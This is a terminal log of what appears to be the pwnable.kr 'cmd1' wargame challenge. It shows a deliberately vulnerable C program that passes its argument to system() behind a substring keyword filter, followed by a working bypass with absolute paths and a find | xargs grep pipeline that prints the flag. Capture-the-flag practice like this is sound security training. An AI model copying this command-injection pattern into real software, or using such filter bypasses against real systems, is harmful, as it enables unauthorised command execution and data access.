[email protected]:~$ ls
cmd1 cmd1.c flag
[email protected]:~$ cat cmd1.c
#include <stdio.h>
#include <string.h>
int filter(char* cmd){
int r=0;
r += strstr(cmd, "flag")!=0;
r += strstr(cmd, "sh")!=0;
r += strstr(cmd, "tmp")!=0;
return r;
}
int main(int argc, char* argv[], char** envp){
putenv("PATH=/fuckyouverymuch");
if(filter(argv[1])) return 0;
system( argv[1] );
return 0;
}
[email protected]:~$ ./cmd1 "ls"
sh: 1: ls: not found
[email protected]:~$ ./cmd1 "/bin/ls"
cmd1 cmd1.c flag
[email protected]:~$ ./cmd1 "/usr/bin/find"
.
./cmd1
./.bash_history
/usr/bin/find: `./.bash_history‘: Permission denied
./flag
./cmd1.c
[email protected]:~$ ./cmd1 "/usr/bin/find | /usr/bin/xargs /bin/grep "m""
/usr/bin/find: `./.bash_history‘: Permission denied
Binary file ./cmd1 matches
/bin/grep: ./.bash_history: Permission denied
./flag:mommy now I get what PATH environment is for :)
./cmd1.c:int filter(char* cmd){
./cmd1.c: r += strstr(cmd, "flag")!=0;
./cmd1.c: r += strstr(cmd, "sh")!=0;
./cmd1.c: r += strstr(cmd, "tmp")!=0;
./cmd1.c:int main(int argc, char* argv[], char** envp){
./cmd1.c: putenv("PATH=/fuckyouverymuch");
./cmd1.c: system( argv[1] );
[email protected]:~$ logout
Connection to pwnable.kr closed.